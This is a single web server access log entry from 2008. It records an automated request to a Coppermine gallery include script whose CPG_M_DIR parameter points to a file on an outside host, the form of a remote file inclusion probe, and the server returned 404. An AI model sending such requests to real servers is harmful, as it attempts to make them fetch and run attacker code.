194.114.145.73 - - [23/Jul/2008:09:37:47 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
